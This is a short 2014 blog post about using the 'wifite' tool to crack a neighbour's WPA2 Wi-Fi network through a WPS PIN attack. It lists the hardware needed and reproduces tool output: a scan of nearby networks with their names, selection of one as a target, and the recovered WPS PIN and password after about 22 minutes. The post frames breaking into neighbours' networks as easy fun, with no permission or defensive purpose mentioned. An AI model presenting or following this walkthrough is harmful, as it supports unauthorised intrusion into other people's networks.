Monday, July 28, 2014

Dummy way to "hack" your neighbour's WIFI

When i've just started my study at CSI course, lot of students were so excited of one program called 'wifite'.
There are too many tools for cracking wifi passwords. It's one of them. 
That day, when i came home, i immediately found that wifite. 
It is written in python, and VERY EASY to use. Just start, choose your target, and press start :)

Interesting, that about 4 years before, i've wrote my own script in bash that does almost the same things :(
I've tried this, and felt like a script kiddie.

What you will need:

1. Wifi network card (USB), most of internal laptop's nics are not supported to inject packets.
2. Install dependencies:
If you want to try and have troubles with installation, use google.
In couple of hours you will get access to WPA encrypted neighbour's AP.

But there was a good thing too. We learned python on the lessons, and i've looked inside the 'wifite' script, there was a lot of useful stuff!

Let's see:

  NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  CoolNet               11  WPA2  66db   wps 
    2  HenP                  11  WPA2  45db   wps 
    3  CIPI                  13  WPA2  43db   wps 
    4  CoolNet2               9  WPA2  40db   wps 
    5  Virus                 11  WPA2  36db   wps 
    6  fani                  11  WPA2  35db   wps 
    7  bbb1950               11  WPA2  33db   wps 
    8  035031801             11  WPA2  30db   wps 
    9  netbox-8845           11  WPA2  29db   wps 
   10  Salon                 11  WPA2  29db    no 
   11  Yeuda                 11  WEP   29db   wps 
   12  niray                 11  WPA2  29db   wps 
   13  Jacob                 11  WEP   29db    no 
   14  Shmueli_Leon          11  WPA2  28db   wps 
   15  gross_zeev 2.4        11  WPA2  27db    no 

 [+] select target numbers (1-15) separated by commas, or 'all': 1

 [+] 1 target selected.

 [0:00:00] initializing WPS PIN attack on CoolNet (F8:1A:67:C8:AB:1E)
 [0:22:47] WPS attack, 357/404 success/ttl, 94.50% complete (3 sec/att)   

 [+] PIN found:     76663919
 [+] WPA key found: testpassword
 [0:08:20] starting wpa handshake capture on "CoolNet"
 [0:00:00] unable to capture handshake in timesent        

 [+] 2 attacks completed:

 [+] 0/2 WPA attacks succeeded
        found CoolNet's WPA key: "testpassword", WPS PIN: 76663919

 [+] quitting  

At this time, cracking WPA2 password with WPS PIN attack took 22 minutes. But another try may take 5 hours. Really it does not matter, we have the time.

No comments:

Post a Comment